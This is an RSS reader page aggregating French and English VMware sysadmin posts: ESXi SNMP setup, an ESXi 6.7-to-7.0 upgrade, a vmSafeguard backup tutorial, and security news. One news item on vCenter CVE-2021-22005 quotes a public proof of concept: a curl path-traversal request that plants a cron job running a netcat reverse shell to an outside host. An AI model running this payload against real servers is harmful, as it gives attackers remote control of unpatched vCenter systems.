FreshRSS

🔒
❌ À propos de FreshRSS
Il y a de nouveaux articles disponibles, cliquez pour rafraîchir la page.
À partir d’avant-hierFlux principal

Disaster recovery strategies for vCenter Server appliance VM

27 novembre 2021 à 05:33

In this post, we'll list some of the most common disaster recovery strategies for small environments for VMware vCenter Server Appliance (VCSA). With small environments, admins usually run only one single sign-on domain, so there is no case where the vCenter Server is linked to another vCenter Server. While it is simpler for any backup solution, it is also a single point of failure. That's why it is important to have some kind of disaster recovery for VCSA.

The post Disaster recovery strategies for vCenter Server appliance VM first appeared on 4sysops.

Comment configurer le SNMP sur VMware ESXi ?

25 novembre 2021 à 10:00

I. Présentation

Dans ce tutoriel, nous allons voir comment configurer le SNMP sur un serveur VMware ESXi afin de pouvoir l'intégrer dans une solution de supervision comme Centreon, Zabbix, Eyes of Network, etc.

Grâce à l'activation du SNMP sur votre hôte ESXi, vous allez pouvoir surveiller sa charge CPU, l'occupation de ses datastores, la RAM consommée, etc... Ce qui me semble indispensable.

Pour ma part, j'utilise un serveur VMware ESXi 7.0 autonome, sur lequel je vais me connecter via l'interface web d'administration afin d'effectuer une partie de la configuration du SNMP. Pour le reste, ce sera en console via SSH.

II. Configuration du SNMP sur ESXi 7.0

La première étape consiste à démarrer le service "snmpd" sur l'hôte ESXi. Pour cela, cliquez sur "Host" à gauche puis "Manage". Ensuite, cliquez sur l'onglet "Services" et dans la liste recherchez "snmpd" : on constate que le service est actuellement arrêté.

Sélectionnez le service "snmpd" et cliquez sur le bouton "Start" pour démarrer le service. Désormais, il va s'arrêter et démarrer automatiquement avec l'hôte ESXi.

Démarrer le service SNMP sur VMware ESXi
Démarrer le service SNMP sur VMware ESXi

Une fois que cette opération est effectuée, connectez-vous à votre serveur ESXi via SSH car pour la suite, nous allons jouer de la ligne de commande via esxcli.

En exécutant la commande ci-dessous, vous pouvez afficher la configuration actuelle du SNMP. Ce sera l'occasion de voir que rien n'est configuré.

esxcli system snmp get

Maintenant, nous allons configurer le SNMP sur notre hôte ESXi. Partons du principe que l'on souhaite autoriser le serveur de supervision avec l'adresse IP "192.168.10.150" et déclarer la communauté SNMP "itconnect".

Pour cela, il faut déclarer une nouvelle "cible" sur notre serveur ESXi, voici la commande correspondante :

esxcli system snmp set [email protected]/itconnect

Au sein de la commande ci-dessus, la valeur "161" correspond au numéro de port par défaut du SNMP. Ensuite, nous devons activer le SNMP. Cette action est nécessaire en complément de l'activation du service en lui-même. Voici la commande correspondante :

esxcli system snmp set --enable true

En positionnant le paramètre "--enable" à "false", vous pouvez désactiver le SNMP. Vous pouvez tester la configuration SNMP en exécutant cette commande :

esxcli system snmp test

Vous devriez obtenir le message suivant :

Comments: There is 1 target configured, warmStart notification queued for transmit to configured destinations., test completed normally.

Si vous obtenez le message "Must first configure at least one v1|v2c|v3 trap target" c'est que la cible n'est pas bien déclarée.

Ensuite, il faut autoriser le SNMP au niveau du pare-feu de l'hyperviseur ESXi. Pour cela, il y a plusieurs solutions : ouvrir le flux peu importe l'hôte source, ouvrir le flux pour un sous-réseau complet ou ouvrir le flux seulement pour un serveur, en l'occurrence celui de supervision. Pour cette règle de pare-feu, on va pouvoir s'appuyer sur la règle prédéfinie "snmp" intégrée à ESXi.

Pour ouvrir le flux à tout le monde, utilisez la commande ci-dessous :

esxcli network firewall ruleset set --ruleset-id snmp --allowed-all true

A l'inverse, pour filtrer les accès, on va commencer par refuser les accès à tout le monde ("--allowed-all false") :

esxcli network firewall ruleset set --ruleset-id snmp --allowed-all false

Puis, on va déclarer l'hôte de supervision pour l'autoriser explicitement :

esxcli network firewall ruleset allowedip add --ruleset-id snmp --ip-address 192.168.10.150/32

Enfin, après avoir configuré la règle, il faut l'activer :

esxcli network firewall ruleset set --ruleset-id snmp --enabled true

Pour vérifier si votre serveur de supervision parvient à interroger votre hôte ESXi, vous pouvez utiliser l'outil Linux "snmpwalk", en ligne de commande. Avec ce que nous venons d'établir comme configuration, l'hôte ESXi est interrogeable avec le SNMP V2c.

Remarque : si vous préférez utiliser SNMPv3, je vous invite à lire la documentation VMware. Cette version est prise en charge depuis ESXi 5.1, alors c'est une possibilité.

Pour interroger l'hôte ESXi (192.168.10.149) en SNMP sur la communauté "itconnect" avec snmpwalk, cela donne :

snmpwalk -v 2c -c itconnect 192.168.10.149

En retour, vous devriez avoir de nombreuses lignes puisque l'on n’a pas spécifié d'emplacement au sein de la MIB. Si c'est bien le cas, c'est tout bon ! Votre hôte ESXi est prêt à être ajouté à votre solution de supervision...

The post Comment configurer le SNMP sur VMware ESXi ? first appeared on IT-Connect.

Comment mettre à jour VMware ESXi 6.7 vers 7.0 ?

19 novembre 2021 à 10:00

I. Présentation

Dans ce tutoriel, nous allons voir comment mettre à jour un serveur VMware ESXi 6.7 vers 7.0 en utilisant la ligne de commande esxcli et un paquet d'installation offline.

Pour cet exemple, je vais mettre à jour un ESXi 6.7 en version free vers ESXi 7.0, toujours en version free, mais le processus de mise à jour est le même si vous avez une licence payante. Il existe plusieurs façons de mettre à jour un ESXi vers une version supérieure, notamment à partir d'une image ISO. Pour ma part, j'ai l'habitude de passer par un accès SSH, le jeu de commandes ESXCLI et un paquet d'installation hors ligne appelé "Offline bundle" sur le site de VMware.

Note : avant de démarrer le processus de mise à jour sur l'hôte ESXi, il faudra le basculer en mode maintenance. Cela signifie que les VMs seront éteintes, à moins qu'elles soient migrées vers un autre hôte.

II. Mise à jour ESXi 6.7 vers 7.0

Le processus de mise à jour est découpé en plusieurs étapes, que je vous invite à suivre ci-dessous.

A. Télécharger VMware ESXi 7.0 (Free)

Pour commencer, il faut télécharger les sources d'installation. Cela s'effectue sur le site de VMware, à l'aide d'un compte que vous pouvez créer gratuitement. Pour télécharger ESXi 7.0 Free et obtenir une licence gratuite, suivez ce lien : Télécharger VMware ESXi 7.0 (Free)

Une fois connecté et l'enregistrement fait pour ce produit, vous pouvez accéder au téléchargement en cliquant sur "License & Download". Sur cette page, profitez-en pour récupérer votre clé de licence gratuite pour activer votre hôte ESXi.

Télécharger ESXi 7.0 Free

Un peu plus bas dans la page, vous pouvez voir "VMware vSphere Hypervisor (ESXi) Offline Bundle" : c'est ce qui nous intéresse, cliquez sur le bouton "Manually Download".

Vous allez obtenir une archive ZIP, comme sur l'exemple ci-dessous.

Maintenant, il faut transférer cette archive ZIP sur l'hyperviseur VMware à mettre à jour. Sur l'interface de gestion d'ESXi, cliquez sur "Storage" à gauche, sélectionnez le datastore sur lequel stocker l'archive ZIP et cliquez sur "Datastore browser". Il ne restera plus qu'à vous positionner dans le répertoire où vous souhaitez charger le ZIP, puis à cliquer sur le bouton "Upload".

B. Activer l'accès SSH

Pour se connecter en SSH sur le serveur, il faut activer l'accès si ce n'est pas déjà fait. Pour cela, effectuez un clic droit sur "Host", puis sous "Services", vous allez obtenir l'entrée "Enable Secure Shell (SSH)". Si vous avez "Disable Secure Shell (SSH)", c'est qu'il est déjà actif.

C. Passer en mode maintenance

Connectez-vous en SSH afin d'activer le mode maintenance sur le serveur. Enfin, vous pouvez aussi le faire via l'interface Web avec un clic droit sur "Host" puis "Enter maintenance mode". Prenez vos précautions en éteignant les VMs ou en les déplaçant sur un autre serveur le temps de l'opération.

Pour activer le mode maintenance, voici la commande esxcli à exécuter :

esxcli system maintenanceMode set --enable=true

Une fois que le mode maintenance est actif, les choses sérieuses vont commencer !

D. Mettre à jour ESXi avec esxcli

Avant d'attaquer la mise à jour, sachez que vous pouvez récupérer le numéro de version de votre instance ESXi avec la commande suivante :

vmware -v

Ensuite, on va interroger notre archive ZIP pour voir quels sont les profiles d'installation disponibles dans ce package. Voici la commande à exécuter (adaptez le chemin vers le ZIP) :

esxcli software sources profile list -d /vmfs/volumes/datastore1/MAJ/VMware-ESXi-7.0U3b-18905247-depot.zip

On obtient ceci :

Le profil "ESXi-7.0U3b-18905247-standard" nous intéresse pour effectuer la mise à jour. On peut récupérer le nom via la colonne "Name". Désormais, nous allons lancer la mise à jour en précisant le package (fichier ZIP) et le profil à utiliser, ce qui donne :

esxcli software profile update -d /vmfs/volumes/datastore1/MAJ/VMware-ESXi-7.0U3b-18905247-depot.zip -p ESXi-7.0U3b-18905247-standard

Si vous obtenez une erreur de dépendances, vous pouvez ajouter l'option "-f" à la fin de la commande pour forcer la mise à jour malgré tout. J'ai envie de dire que c'est à vos risques et périls. Je n'ai pas beaucoup de retour là-dessus, si ce n'est qu'en forçant la mise à jour sur un serveur, c'est passé sans conséquence sur le bon fonctionnement.

Mise à jour ESXi 6.7 vers 7.0

Lorsque la mise à jour est terminée, un message va s'afficher : "Message: the update completed successfully". Ensuite, il faut redémarrer l'hôte ESXi pour finaliser la mise à jour vers ESXi 7.0.

Soit vous déclenchez cette action via l'interface Web, soit à partir d'une commande esxcli. Comme on est connecté en ligne de commande, autant continuer sur cette voie. Voici la commande à exécuter pour redémarrer l'hôte ESXi :

esxcli system shutdown reboot --reason "Finaliser maj vers 7.0"

Une fois que votre serveur ESXi aura redémarré et que vous avez de nouveau la main dessus, déjà vous êtes soulagé, et vous pouvez voir le nouveau numéro de version : 7.0 Update 3.

ESXi 6.7 vers 7.0

E. Activer la licence ESXi

Un hôte ESXi en version free doit être activé grâce à la licence fournie sur le site de VMware. Pour spécifier votre licence, cliquez sur "Host" à gauche, puis "Manage". Ensuite, à droite, cliquez sur l'onglet "Licensing" et enfin "Assign license". Il ne reste plus qu'à saisir la clé et à valider.

Voilà, vous n'avez plus qu'à sortir votre hôte ESXi du mode maintenance et à démarrer vos machines virtuelles pour relancer la production. Bravo, votre serveur tourne sur VMware ESXi 7.0 !

The post Comment mettre à jour VMware ESXi 6.7 vers 7.0 ? first appeared on IT-Connect.

Compress-Vhdx: Compress multiple VHDX files using the PowerShell cmdlet Optimize-VHD

17 novembre 2021 à 16:05

My PowerShell function Compress-Vhdx allows you to compress multiple VHDX files with a single command to reclaim space from a folder (and its nested subfolders). The function uses the Optimize-VHD PowerShell cmdlet, which comes with the Hyper-V role. You no longer need to provide the full syntax separately for each VHD. When the operation is complete, you get a nice summary of the amount of space saved for each separate VHDX.

The post Compress-Vhdx: Compress multiple VHDX files using the PowerShell cmdlet Optimize-VHD first appeared on 4sysops.

Installer macOS Monterey sur PC avec VMware

Si vous passez souvent par là, alors vous avez l’habitude de ce type de vidéos ou d’article. En effet, c’est régulièrement que je vous explique comment installer la nouvelle version de MacOS sur PC via VMware ou encore en passant par un Hackintosh. Et bien je reviens une nouvelle fois pour vous proposer d’installer la …

Install the free new VMware Tanzu Community Edition

12 novembre 2021 à 17:14

VMware has released a new version of Tanzu called Tanzu Community Edition. This version is a free download that you can install and use on several Windows, Linux, and macOS machines.

The post Install the free new VMware Tanzu Community Edition first appeared on 4sysops.

Sauvegarde de VMs sur des hôtes VMware ESXi avec vmSafeguard

10 novembre 2021 à 10:00

I. Présentation

Aujourd'hui, c'est un grand jour, car je vais vous présenter mon projet vmSafeguard (open source) que je développe depuis plus d'un an. Cette application full-web est un système d'administration et d'automatisation de gestion de sauvegardes pour un ou plusieurs hôtes VMWare ESXi.

L'objectif étant de pouvoir automatiser entièrement les processus de sauvegarde de vos machines virtuelles, en évitant in fine au maximum l'intervention humaine. (si-vous avez déjà lu d'autres articles que j'ai écrits, vous commencez à saisir que j'adore tout automatiser je pense :-)).

J'utilise cette solution au quotidien dans le cadre de mon travail, au sein de plusieurs environnements de production. Tout au long de ce tutoriel, je vais utiliser la version conteneurisée de mon application, via Docker. Si vous souhaitez ne pas utiliser Docker pour son installation, je vous laisse le soin de consulter la documentation de mon projet (lien ci-dessous). Je préfère vous présenter vmSafeguard avec docker, comme ça si vous n'aimez pas l'application, vous aurez juste à supprimer l'image et son conteneur associé, et vous n'aurez pas perdu votre temps à provisionner un nouvel OS dédié.

Le serveur VMware ESXi qui va me servir de "test" pour cette démo est un ESXi 7.x.  L'outil vmSafeguard est aussi disponible pour les ESXi en version 6.x, mais avec moins de fonctionnalités. (cf la documentation)

Pour plus d'information, voici le Lien github du projet : https://github.com/archidote/vmSafeguard

A. Perspectives d'amélioration

Bien que pleinement fonctionnel, je souhaite continuer à améliorer cet outil, et certaines fonctionnalités et améliorations pourraient voir le jour à l'avenir, notamment :

  • Sauvegarde "à chaud" des VMs, sans obligation de les éteindre pour réaliser l'action de sauvegarde comme c'est le cas actuellement (c'est géré automatiquement par l'outil vmSafeguard).
  • Amélioration de l'API afin d'avoir plus de fonctionnalités et de granularité pour les alertes mail.
  • Affichage des logs "en live" (sans avoir besoin de recharger la page manuellement)
  • Identifier les VM avec leur nom plutôt que le VMID
  • etc.

B. Prérequis

Voici les prérequis à respecter afin de pouvoir installer vmSafeguard :

  • Disposer d'un ou plusieurs hyperviseurs VMware ESXi opérationnels pouvant communiquer avec la machine qui hébergera vmSafeguard
  • Le service SSH et l'ESXi Shell doivent être activés (au démarrage), sur le(s) hôte(s) ESXi concerné(s)
  • Privilèges d'administrateur sur le(s) hôte(s) ESXi ainsi que sur la machine hébergeant l'application.
  • La version conteneurisée de vmSafeguard ne supporte pas HTTPS pour des raisons techniques (dialogue API, etc.). Si vous souhaitez absolument utiliser HTTPS, suivez l'installation standard sans Docker, qui n'est guère plus longue. 

C. À ne surtout pas faire !

  • N'ajoutez pas d'espace dans les noms des machines virtuelles. Les VMs doivent avoir une nomenclature comme celle-ci :
    • Debian-11-64Bits ou Debian_11_64bits ✅
    • mais pas comme ça : Debian 11 64bits, sinon vmSafeguard plantera ❌
    • Ne renommez pas vos VMs ❌
  • Ne stockez pas votre machine virtuelle dans un sous-dossier d'une banque de données. Les VM doivent être stockées à la racine d'une banque de données spécifique comme celle-ci :
    • /vmfs/volume/datatsore1/MyDebian10Vm/ ✅
      Et surtout pas comme ça
      /vmfs/volume/datastore1/VMsdebian/MyDebian10Vm/ ❌

D. Environnement de mise en place

  • vmSafeguard : exécuté dans un container docker via un hôte Linux (Kali linux) sur le port 8080 (192.168.130.128:8080)
  • ESXi 7.x : adresse IP 192.168.130.131

Les deux machines, à savoir l'ESXi et l'hôte Docker doivent pouvoir communiquer entre elle.

II. Installation de vmSafeguard via Docker

Ce guide vous montrera comment configurer l'application vmSafeguard en tant que conteneur Docker rapidement.

Quelques ressources utiles sous la forme de tutoriels vidéos (installation et démonstration - non commenté) :

Installation et configuration de vmSafeguard (Docker)

Actions de sauvegarde avec vmSafeguard (Docker)

Installation de vmSafeguard pour un environnement de production et tests divers (Ubuntu)

A. Extraire (exécuter) l'image de vmSafeguard du hub docker (ESXi 7.x)

Via l'utilisateur root, exécutez les commandes suivantes :

docker run -d -p 8080:80 archidote/vmsafeguard

warning J'attire votre attention sur le point suivant :

Vu que j'utilise un port d'écoute différent de 80 et 443 (8080) du côté de l'hôte docker, l'ESXi n'accepte pas par défaut d'envoyer des données sur d'autres ports que ces deux-là. Ce qui est primordial pour le fonctionnement de l'API locale. (Grrr...) Comme je vais utiliser le port 8080 côté hôte docker, je vais donc être amené à désactiver le pare-feu ESXi pour autoriser l'API locale à dialoguer sur un autre port que 80. Nous allons voir plus bas comment désactiver le pare-feu de l'ESXi le cas échéant. Néanmoins, si vous souhaitez vraiment utiliser le port 80 côté hôte docker (ce que je ne fais pas ici), vous pouvez vous abstenir de désactiver le pare-feu de l'ESXi.

Vérifiez que le conteneur est bien en cours d'exécution via la commande suivante :

docker ps

Si tel est le cas, connectez-vous au shell du conteneur par l'intermédiaire de la commande suivante :

docker exec -it <id of the container vmSafeguard> bash
#################
You are into the container with a bash shell
#################

# Démarrez le service cron par le biais de la commande suivante : 
# Par défaut, l'heure du conteneur se base sur l'heure "Française et sur la timezone Europe/Paris

service cron start

Dès lors, dirigez-vous vers le dossier suivant :

cd /root/.ssh/
Figure 1 : Capture d'écran de mon terminal, démontrant les actions précédentes

B. Copiez votre clé publique SSH sur votre (vos) ESXi(s)

vmSafeguard utilise l'authentification par clé SSH publique/privée, pour pouvoir dialoguer avec les hôtes ESXi. Par défaut, le conteneur vmSafeguard dispose d'un couple de clés SSH, accessibles depuis le shell du container. Si vous souhaitez utiliser votre propre couple de clés ou en générer une nouvelle, pas de problème. Il suffira de remplacer cette paire de clés.

Transmettez la clé publique de vmSafeguard via la commande suivante à votre ESXi :

cat id_rsa.pub | ssh -p 22 [email protected]adresse-ip-esxi \ 'cat >> /etc/ssh/keys-root/authorized_keys'
<mot de passe de l'utilisateur ESXi (root)>
Figure 2 : Transmission de notre clé publique à notre ESXi (192.168.130.131)

Note 1 : Si vous souhaitez interagir avec plusieurs ESXi, répétez la commande précédente sur chaque hôte ESXi.

Afin de tester si vous pouvez vous connecter sans mot de passe via SSH, essayer de vous connecter avec la commande suivante :

ssh -p 22 [email protected]ip-esxi
Figure 3 : La connexion SSH vers l'hyperviseur ESXi s'effectue maintenant sans mot de passe.

Désactivez le pare-feu de votre ESXi, si vous n'avez pas changé le port d'écoute côté "Hôte" sur 80.

esxcli network firewall set --enabled
esxcli network firewall get
Figure 4 : Désactivation du pare-feu.

Terminez la connexion SSH initiée avec la commande :

exit

C. Spécifier le nom de votre datastore

Dans cette nouvelle étape, nous allons spécifier dans la configuration de vmSafeguard le nom du datastore qui stockera les futures sauvegardes.

Depuis le terminal de votre conteneur, exécutez la commande suivante afin de modifier le nom du datastore en modifiant la valeur de la variable "DATASTORE".

nano /var/www/html/vmSafeguard/scripts/backup.sh
Figure 5 : Modification du nom du datastore (en fonction de votre configuration) qui accueillera les futures sauvegardes.

Enregistrez le fichier backup.sh et quittez le conteneur :

exit

D. Configurer le panneau Web

Avec un navigateur pouvant communiquer avec votre hôte Docker, entrez l'URL suivante pour configurer votre première connexion :

  • http://localhost:8080/vmSafeguard/scripts/router.php?action=welcome

Lorsque vous accédez à vmSafeguard, vous devez fournir un identifiant et un mot de passe. Voici les identifiants par défaut (que vous pouvez modifier par la suite):

  • Identifiant : admin
  • Mot de passe : helloworld

Renseignez, les 5 champs ci-dessous, en les adaptant en fonction de votre configuration.

Note 2 : Ne pas oublier de préciser le port s'il est différent de 80, dans le champ vmSafeguard IP.

Figure 6 : Menu "Welcome"

Cliquez sur "Submit" pour valider et accéder au tableau de bord de l'application.

Figure 7 : Informations renseignées sauvegardées.

Cliquez sur "Reload the dashboard", pour accéder à celui-ci.

Voici l'interface principale de vmSafeguard.

Figure 8 - Tableau de bord de vmSafeguard

III. Tests

A. Afficher un résumé de chaque VM de l'ESXi

Depuis le tableau de bord, cliquez sur "Summary All", afin d'obtenir le VMID de chacune des VMs de votre ESXi. L'obtention de ce VMID est primordiale, car sans celui-ci, vous ne pourrez pas programmer de sauvegardes. En effet, au moment de créer un nouveau job de sauvegarde il faudra spécifier le VMID de la VM à sauvegarder.

Figure 9 - Petit résumé des caractéristiques de chacune des VMs qui sont hébergées sur mon ESXi de test.

Ici, nous pouvons constater que trois VMs sont présentes sur mon hôte ESXi (192.168.130.131).

Si vous souhaitez obtenir le VMID d'une seule VM en particulier, utilisez le menu suivant et entrez le nom de votre VM, depuis l'interface du dashboard :

Figure 10 - Trouver le VMID d'une VM seule et quelques informations connexes.

B. Sauvegarder une ou plusieurs VM

En guise d'exemple, je vais sauvegarder deux VMs. Pour cela, je vais utiliser le sous-menu "Pool Backup", en entrant les deux "VMID" des VMs, séparés par un espace. Si vous souhaitez sauvegarder une seule VM, utilisez le sous-menu de gauche en entrant simplement son VMID.

Note 3 : Si la VM est éteinte, vmSafeguard la backupera directement, sinon il essaiera de l'éteindre de manière "conventionnelle" (si la VM à les vmware tools). Dans le cas contraire, vmSafeguard éteindra de force celle-ci pour procéder à sa sauvegarde. Lorsque la VM est allumée, le processus d'extinction avant sauvegarde est plus long (notamment si la VM doit faire des mises à jour par exemple)

Figure 11 - Deux sous-menus permettant la sauvegarde seule ou de plusieurs VMs, sans les différer dans le temps.

Cliquez sur Start (pool) backup, pour lancer la sauvegarde directement.

Figure 12 - Déclenchement du processus de sauvegarde

Cliquez sur Latest logs pour obtenir les derniers logs concernant la sauvegarde en cours.

Figure 13 - Affichage des logs de vmSafeguard

Sur la copie d'écran ci-dessus, j'attire votre attention sur les deux lignes qui sont pointées par une flèche rouge. Depuis la version 6.2, vmSafeguard, utilise deux API (locale/distante) qui permettent de vous envoyer un mail dans les situations suivantes :

  • Backup(s) achevé(s)
  • ESXi détecté comme étant hors ligne
Figure 14 - Rapport de sauvegarde, envoyé par mail pour chaque VMs sauvegardé.

C. Programmez vos sauvegardes

Tout l'intérêt de vmSafeguard est de pouvoir différer la programmation de vos sauvegardes. Grâce à ce menu, vous pouvez programmer vos sauvegardes afin de les automatiser : ce qui est très pratique, si vous souhaitez effectuer des sauvegardes de plusieurs machines virtuelles, la nuit par exemple.

Veillez à respecter la syntaxe cron, car par souci de sécurité, la tâche cron ne sera pas inscrite dans la crontab de l'utilisateur www-data le cas échéant.

Voici un site qui vous aidera, si vous souhaitez créer une tâche cron complexe : https://crontab.guru/examples.html

Vous avez le choix entre programmer une sauvegarde d'une seule VM (menu de gauche), et une sauvegarde de plusieurs VM. Dans tous les cas, il faudra insérer le(s) VMID(s) de(s) machine(s).

Figure 15 : Menu "Schedule a backup"

vmSafeguard contrôle l'existence ou non des VMID qui lui sont transmis avant de lancer la sauvegarde. Dans le cas où un mauvais VMID serait indiqué par erreur, pas de panique la sauvegarde sera simplement déprogrammée pour cette instance. Cela n'annule pas une sauvegarde de plusieurs machines virtuelles, si les autres VMID sont corrects.

Figure 14 - Enregistrement de la tâche cron.

Dans le cas du formulaire de droite, "Pool Backup", pensez bien à mettre un espace entre chaque VMID afin qu'ils soient tous pris en compte. Lorsque la sauvegarde s'effectue sans interaction humaine, toutes les informations sont journalisées. Menu > Logs

Figure 16 - Affichage des logs suite au déclenchement de la sauvegarde.
Figure 17 - Rapport de sauvegarde envoyé par mail pour chaque VMs sauvegardé.

D. Changer d'ESXi pour un autre hôte ESXi

Depuis la version 5.0, vmSafeguard est capable de pouvoir changer d'ESXi, afin de sauvegarder les VMs d'un autre hôte. Cette approche vous permet de jongler d'ESXi en ESXi, en fonction des emplacements des VMs que vous souhaitez sauvegarder.

Depuis le tableau de bord, accédez au sous-onglet suivant, et renseignez l'IP et le port du service SSH de votre deuxième hôte ESXi.

Figure 18 - Changement d'hôte ESXi, afin d'administrer celui-ci.
Figure 19 - Informations renseignées enregistrées.

Cliquez sur "Reload the dashboard".

Figure 20 - Tableau de bord actualisé.

Nous constatons que l'ESXi 192.168.130.132 n'a aucune VM existante, mais c'est normal. Rassurez-vous 😉

E. Menu Paramètres

Enfin, pour finir, je vous présente le menu des paramètres de vmSafeguard. Il rassemble un ensemble d'éléments personnalisables comme :

  • L'ajout d'un hôte ESXi, qui ne partage pas une banque de données communes avec d'autres ESXi
  • Changement du mot de passe du compte admin, email, etc.
  • Fixer le rafraichissement de la page d'accueil de manière automatique toutes les X secondes.
  • Augmenter/Diminuer le temps, en seconde, d'écriture des logs (notamment pour la progression de la sauvegarde)
  • Supprimer les anciennes sauvegardes > à X jours de manière automatique
Figure 21 - Menu paramètres

IV. Conclusion

J'espère que ce tutoriel et la présentation de ce projet vous auront plu. N'hésitez pas à revenir vers moi via l'espace commentaire si vous avez une quelconque question, ou si vous souhaitez suggérer une ou plusieurs fonctionnalités que je pourrais intégrer à vmSafeguard.

Si le projet vous intéresse et que vous souhaitez l'intégrer dans un environnement de production pour "le long terme", installez vmSafeguard sans Docker. Ce n'est pas plus compliqué que ce vous venez de voir.

Dans le cas où vous rencontriez un bug ou un problème technique, je vous invite à ouvrir une issue directement sur la page GitHub du projet. Si vous trouvez la documentation un peu floue sur certains points, je vous encourage aussi à me le signaler.

The post Sauvegarde de VMs sur des hôtes VMware ESXi avec vmSafeguard first appeared on IT-Connect.

How to migrate VCSA to a new host without VMotion

5 novembre 2021 à 14:36

This is a post for VMware admins who manage a small environment based on vSphere Essentials that does not have a VMotion license. In some situations, you need to migrate VMware VCSA (vCenter Server Appliance) to another host within the environment so that you can carry out maintenance tasks or upgrade the underlying host to the latest ESXi version.

The post How to migrate VCSA to a new host without VMotion first appeared on 4sysops.

Snapshot management in vSphere

2 novembre 2021 à 16:27

As many who use vCenter to host their virtual servers know, snapshots are a critical function, one that is frequently undertaken before upgrades or changes to a system. However, taking snapshots can be a tedious process, particularly if you are taking multiple snapshots. Fortunately, VMware has created the PowerCLI PowerShell module, which can make this process much more efficient. I used the VMware.VimAutomation.Core PowerShell module, which was downloaded from the PowerShell Gallery website. Let's review how to perform common tasks in the web view, and see how to do the same task from the CLI.

The post Snapshot management in vSphere first appeared on 4sysops.

New free VMware tool: Virtual Machine Desired State Configuration (VMDSC)

22 octobre 2021 à 18:23

The new free VMware tool, Virtual Machine Desired State Configuration (VMDSC), allows you to optimize the performance of your virtual infrastructure without impacting business-critical VMs. You can modify the configuration of VMs that need vCPU or memory changes without rebooting them. The changes are stored in the VM's VMX configuration file and then used for reconfiguration at the next reboot. The next reboot is usually scheduled a long time in advance during application upgrades or cumulative patch installs.

The post New free VMware tool: Virtual Machine Desired State Configuration (VMDSC) first appeared on 4sysops.

VMware vSAN Automatic Rebalance vs. Proactive Rebalance

15 octobre 2021 à 15:26

VMware vSAN's Automatic Rebalance capacity is part of vSphere 7 U2. What is the difference between vSAN Automatic Rebalance and vSAN Proactive Rebalance? Storage usage higher than 80% triggers reactive rebalancing. A difference of 30% between vSAN capacity disks will trigger vSAN's Proactive Rebalancing function.

The post VMware vSAN Automatic Rebalance vs. Proactive Rebalance first appeared on 4sysops.

VMware Tanzu Services overview

8 octobre 2021 à 20:28

The VMware Tanzu portfolio offers several services that allow the enterprise to manage the container ecosystem under VMware vSphere 7. vSphere is the necessary underlying virtualization system, and this will not change. What changes for VMware admins is the integration of containerized systems managed with different solutions, such as Kubernetes.

The post VMware Tanzu Services overview first appeared on 4sysops.

Bulletin d’actualité du CERT-FR – 27/09/2021

Bulletin d’actualité du 27/09/2021 Nous voici de nouveau ensemble dans notre rendez-vous de fin de semaine pour revenir sur les différents bulletins de sécurité publiés par le CERT-FR ! Durant la période du 20 septembre au 26 septembre 2021, le CERT-FR (Centre gouvernemental de veille, d’alerte et de réponse aux attaques informatiques en France) a …

New features in VMware vSphere 7 Update 3

1 octobre 2021 à 19:34

VMware recently announced the latest version of vSphere 7 Update 3. This version is an evolution of a rather complete and polished product suite from VMware. There are many small enhancements and updates with a few innovations that will make your applications run faster.

The post New features in VMware vSphere 7 Update 3 first appeared on 4sysops.

vSphere Alert Center: Get alerts from multiple vCenter Servers with a free tool

30 septembre 2021 à 12:08

The free utility vSphere Alert Center from VMware allows you to set up alerts from multiple vCenter Servers directly to your desktop. The tool has been released by the VMware Flings website, which is a laboratory for experimental, useful, and cool utilities for VMware products.

The post vSphere Alert Center: Get alerts from multiple vCenter Servers with a free tool first appeared on 4sysops.

VMware vCenter – CVE-2021-22005 : un exploit circule sur le Web !

28 septembre 2021 à 17:44

Je crois qu'il est temps d'en remettre une couche au sujet de la faille de sécurité critique qui touche les serveurs VMware vCenter en version 6.7 et 7.0 : un exploit prêt à l'emploi circule sur le Web, ce qui facilite grandement les attaques !

Comme je l'expliquais dans un précédent article au sujet de cette vulnérabilité CVE-2021-22005, elle peut être exploitée par quelqu'un qui est capable de contacter le serveur vCenter sur le réseau (port 443), peu importe la configuration qui est en place sur le serveur vCenter, et sans être authentifié.

Quant à l'exploit prêt à l'emploi et qui circule sur Internet, il permet d'exploiter cette vulnérabilité et de mettre en place un reverse shell sur le serveur distant, ce qui n'était pas le cas avec l'exploit initial. De quoi permettre l'exécution de code arbitraire, au bon vouloir de l'attaquant.

Initialement, la vulnérabilité touchait le service Analytics de vCenter, mais suite aux informations publiées par un dénommé WVU, il serait possible de passer par le composant Customer Experience Improvement Program, qui est actif par défaut. On pourrait presque parler de deux failles de sécurité différentes, comme le suggère l'analyste du CERT/CC, Will Dormann.

CVE-2021-22005: Exploitation in the wild confirmed. Unredacted RCE PoC against CEIP below.

curl -kv "https://172.16.57.2/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/$RANDOM" -H Content-Type: -d "* * * * * root nc -e /bin/sh 172.16.57.1 4444" https://t.co/wi08brjl3r pic.twitter.com/bwjMA21ifA

— wvu (@wvuuuuuuuuuuuuu) September 27, 2021

Désormais, des groupes de hackers ont pu construire un code d'exploit fonctionnel et prêt à l'emploi pour compromettre facilement les serveurs vCenter, à partir des informations publiées par le chercheur Jang.

Retenez que, n'importe qui capable de joindre un serveur vCenter non patché, peut le compromettre à cause de cette faille de sécurité. Quand on sait qu'il y a des serveurs vCenter accessibles sur une adresse IP publique, voire même indexés dans Google, ce n'est pas rassurant pour les entreprises concernées.

Pour protéger vos serveurs VMware vCenter, vous devez viser les versions suivantes :

Source

The post VMware vCenter – CVE-2021-22005 : un exploit circule sur le Web ! first appeared on IT-Connect.

Installer Windows 11 dans une machine virtuelle avec VMware Workstation

23 septembre 2021 à 16:07
Par : Le Crabe

Pour tester sans risques Windows 11 sur votre ordinateur, la meilleure solution est d’installer le nouvel OS de Microsoft dans une machine virtuelle. Une machine virtuelle est un environnement virtualisé qui fonctionne sur une machine physique et qui possède les mêmes caractéristiques que celle-ci (CPU, RAM, disque dur, carte réseau…). Vous pouvez y installer n’importe quel système d’exploitation...

Source

VMware : une faille critique affecte tous les serveurs vCenter 6.7 et 7.0

22 septembre 2021 à 13:56

VMware a publié un bulletin de sécurité pour informer ses clients de la présence d'une faille de sécurité critique au sein de toutes les installations de vCenter Server en version 6.7 et 7.0.

Pour rappel, le vCenter est un serveur de gestion pour faciliter l'administration et la configuration d'un ensemble de serveurs VMware et des machines virtuelles associées.

